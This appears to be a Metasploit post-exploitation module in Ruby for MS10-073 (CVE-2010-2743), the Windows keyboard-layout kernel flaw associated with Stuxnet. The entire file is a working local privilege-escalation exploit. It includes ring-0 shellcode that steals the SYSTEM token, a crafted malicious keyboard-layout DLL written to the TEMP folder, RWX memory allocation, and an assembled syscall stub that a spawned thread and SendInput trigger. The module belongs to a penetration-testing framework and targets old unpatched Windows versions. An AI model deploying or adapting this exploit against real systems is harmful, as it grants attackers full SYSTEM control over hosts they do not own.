modules/post/windows/escalate/ms10_073_kbdlayout.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasm'
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Version
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation',
'Description' => %q{
This module exploits the keyboard layout vulnerability exploited by Stuxnet. When
processing specially crafted keyboard layout files (DLLs), the Windows kernel fails
to validate that an array index is within the bounds of the array. By loading
a specially crafted keyboard layout, an attacker can execute code in Ring 0.
},
'License' => MSF_LICENSE,
'Author' => [
'Ruben Santamarta', # First public exploit
'jduck' # Metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'References' => [
[ 'OSVDB', '68552' ],
[ 'CVE', '2010-2743' ],
[ 'MSB', 'MS10-073' ],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1' ],
[ 'EDB', '15985' ]
],
'DisclosureDate' => '2010-10-12',
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
core_channel_eof
core_channel_open
core_channel_read
core_channel_write
stdapi_fs_delete_file
stdapi_railgun_api
stdapi_railgun_memwrite
stdapi_sys_config_getenv
stdapi_sys_process_getpid
]
}
}
)
)
end
def run
mem_base = nil
dllpath = nil
hDll = false
version = get_version_info
unless version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::Win7_SP0)
print_error("#{version.product_name} is not vulnerable.")
return
end
unless version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::XP_SP2)
print_error("#{version.product_name} is vulnerable, but not supported by this module.")
return
end
# syscalls from http://j00ru.vexillium.org/win32k_syscalls/
if version.build_number == Msf::WindowsVersion::Win2000
system_pid = 8
pid_off = 0x9c
flink_off = 0xa0
token_off = 0x12c
addr = 0x41424344
syscall_stub = <<~EOS
mov eax, 0x000011b6
lea edx, [esp+4]
int 0x2e
ret 0x1c
EOS
else # XP
system_pid = 4
pid_off = 0x84
flink_off = 0x88
token_off = 0xc8
addr = 0x60636261
syscall_stub = <<~EOS
mov eax, 0x000011c6
mov edx, 0x7ffe0300
call [edx]
ret 0x1c
EOS
end
ring0_code =
# "\xcc" +
# save registers -- necessary for successful recovery
"\x60" +
# get EPROCESS from ETHREAD
"\x64\xa1\x24\x01\x00\x00" \
"\x8b\x70\x44" +
# init PID search
"\x89\xf0" \
"\xbb" + 'FFFF' \
"\xb9" + 'PPPP' +
# look for the system pid EPROCESS
"\xba" + 'SSSS' \
"\x8b\x04\x18" \
"\x29\xd8" \
"\x39\x14\x08" \
"\x75\xf6" +
# save the system token addr in edi
"\xbb" + 'TTTT' \
"\x8b\x3c\x18" \
"\x83\xe7\xf8" +
# re-init the various offsets
"\x89\xf0" \
"\xbb" + 'FFFF' \
"\xb9" + 'PPPP' +
# find the target pid token
"\xba" + 'TPTP' \
"\x8b\x04\x18" \
"\x29\xd8" \
"\x39\x14\x08" \
"\x75\xf6" +
# set the target pid's token to the system token
"\xbb" + 'TTTT' \
"\x89\x3c\x18" +
# restore start context
"\x61" +
# recover in ring0, return to caller
"\xc2\x0c\00"
dll_data =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x2E\x64\x61\x74\x61\x00\x00\x00" \
"\xE6\x00\x00\x00\x60\x01\x00\x00\xE6\x00\x00\x00\x60\x01\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x94\x01\x00\x00\x9E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\xA6\x01\x00\x00\xAA\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x9C\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x01\x00\x00\x00\xC2\x01\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00"
pid = session.sys.process.getpid
print_status('Attempting to elevate PID 0x%x' % pid)
# Prepare the shellcode (replace platform specific stuff, and pid)
ring0_code.gsub!('FFFF', [flink_off].pack('V'))
ring0_code.gsub!('PPPP', [pid_off].pack('V'))
ring0_code.gsub!('SSSS', [system_pid].pack('V'))
ring0_code.gsub!('TTTT', [token_off].pack('V'))
ring0_code.gsub!('TPTP', [pid].pack('V'))
# Create the malicious Keyboard Layout file...
tmpdir = session.sys.config.getenv('TEMP')
fname = 'p0wns.boom'
dllpath = "#{tmpdir}\\#{fname}"
fd = session.fs.file.new(dllpath, 'wb')
fd.write(dll_data)
fd.close
# Can't use this atm, no handle access via stdapi :(
# dll_fd = session.fs.file.new(dllpath, 'rb')
# Instead, we'll use railgun to re-open the file
ret = session.railgun.kernel32.CreateFileA(dllpath, GENERIC_READ, 1, nil, 3, 0, 0)
print_status(ret.inspect)
if ret['return'] < 1
print_error("Unable to open #{dllpath}")
return
end
hDll = ret['return']
print_status("Wrote malicious keyboard layout to #{dllpath} ..")
# Allocate some RWX virtual memory for our use..
mem_base = addr & 0xffff0000
mem_size = (addr & 0xffff) + 0x1000
mem_size += (0x1000 - (mem_size % 0x1000))
mem = session.railgun.kernel32.VirtualAlloc(mem_base, mem_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if (mem['return'] != mem_base)
print_error('Unable to allocate RWX memory @ 0x%x' % mem_base)
return
end
print_status(format('Allocated 0x%x bytes of memory @ 0x%x', mem_size, mem_base))
# Initialize the buffer to contain NO-OPs
nops = "\x90" * mem_size
ret = session.railgun.memwrite(mem_base, nops, nops.length)
if !ret
print_error('Unable to fill memory with NO-OPs')
return
end
# Copy the shellcode to the desired place
ret = session.railgun.memwrite(addr, ring0_code, ring0_code.length)
if !ret
print_error('Unable to copy ring0 payload')
return
end
# InitializeUnicodeStr(&uStr,L"pwn3d.dll"); -- Is this necessary?
pKLID = mem_base
pStr = pKLID + (2 + 2 + 4)
kbd_name = 'pwn3d.dll'
uni_name = Rex::Text.to_unicode(kbd_name + "\x00")
ret = session.railgun.memwrite(pStr, uni_name, uni_name.length)
if !ret
print_error('Unable to copy unicode string data')
return
end
unicode_str = [
kbd_name.length * 2,
uni_name.length,
pStr
].pack('vvV')
ret = session.railgun.memwrite(pKLID, unicode_str, unicode_str.length)
if !ret
print_error('Unable to copy UNICODE_STRING structure')
return
end
print_status('Initialized RWX buffer ...')
# Get the current Keyboard Layout
ret = session.railgun.user32.GetKeyboardLayout(0)
if ret['return'] < 1
print_error('Unable to GetKeyboardLayout')
return
end
hKL = ret['return']
print_status('Current Keyboard Layout: 0x%x' % hKL)
# _declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx(
# IN HANDLE Handle,
# IN DWORD offTable,
# IN PUNICODE_STRING puszKeyboardName,
# IN HKL hKL,
# IN PUNICODE_STRING puszKLID,
# IN DWORD dwKLID,
# IN UINT Flags
# )
# Again, railgun/meterpreter doesn't implement calling a non-dll function, so
# I tried to hack up this call to KiFastSystemCall, but that didn't work either...
=begin
session.railgun.add_function('ntdll', 'KiFastSystemCall', 'DWORD',
[
[ 'DWORD', 'syscall', 'in' ],
[ 'DWORD', 'handle', 'in' ],
[ 'DWORD', 'offTable', 'in' ],
[ 'PBLOB', 'pKbdName', 'in' ],
[ 'DWORD', 'hKL', 'in' ],
[ 'PBLOB', 'pKLID', 'in' ],
[ 'DWORD', 'dwKLID', 'in' ],
[ 'DWORD', 'Flags', 'in' ]
])
ret = session.railgun.ntdll.KiFastSystemCall(dll_fd, 0x1ae0160, nil, hKL, pKLID, 0x666, 0x101)
print_status(ret.inspect)
=end
# Instead, we'll craft a machine code blob to setup the stack and perform
# the system call..
asm = <<~EOS
pop esi
push 0x101
push 0x666
push #{'0x%x' % pKLID}
push #{'0x%x' % hKL}
push 0
push 0x1ae0160
push #{'0x%x' % hDll}
push esi
#{syscall_stub}
EOS
# print_status("\n" + asm)
bytes = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
# print_status("\n" + Rex::Text.to_hex_dump(bytes))
# Copy this new system call wrapper function into our RWX memory
func_ptr = mem_base + 0x1000
ret = session.railgun.memwrite(func_ptr, bytes, bytes.length)
if !ret
print_error('Unable to copy system call stub')
return
end
print_status('Patched in syscall wrapper @ 0x%x' % func_ptr)
# GO GO GO
ret = session.railgun.kernel32.CreateThread(nil, 0, func_ptr, nil, 'CREATE_SUSPENDED', nil)
if ret['return'] < 1
print_error('Unable to CreateThread')
return
end
hthread = ret['return']
# Resume the thread to actually have the syscall happen
ret = client.railgun.kernel32.ResumeThread(hthread)
if ret['return'] < 1
print_error('Unable to ResumeThread')
return
end
print_good('Successfully executed syscall wrapper!')
# Now, send some input to cause ring0 payload execution...
print_status('Attempting to cause the ring0 payload to execute...')
vInput = [
1, # INPUT_KEYBOARD - input type
# KEYBDINPUT struct
0x0, # wVk
0x0, # wScan
0x0, # dwFlags
0x0, # time
0x0, # dwExtraInfo
0x0, # pad 1
0x0 # pad 2
].pack('VvvVVVVV')
ret = session.railgun.user32.SendInput(1, vInput, vInput.length)
print_status('SendInput: ' + ret.inspect)
ensure
# Clean up
if mem_base
ret = session.railgun.kernel32.VirtualFree(mem_base, 0, MEM_RELEASE)
if !(ret['return'])
print_error('Unable to free memory @ 0x%x' % mem_base)
end
end
# dll_fd.close
if hDll
ret = session.railgun.kernel32.CloseHandle(hDll)
if !(ret['return'])
print_error('Unable to CloseHandle')
end
end
session.fs.file.rm(dllpath) if dllpath
end
end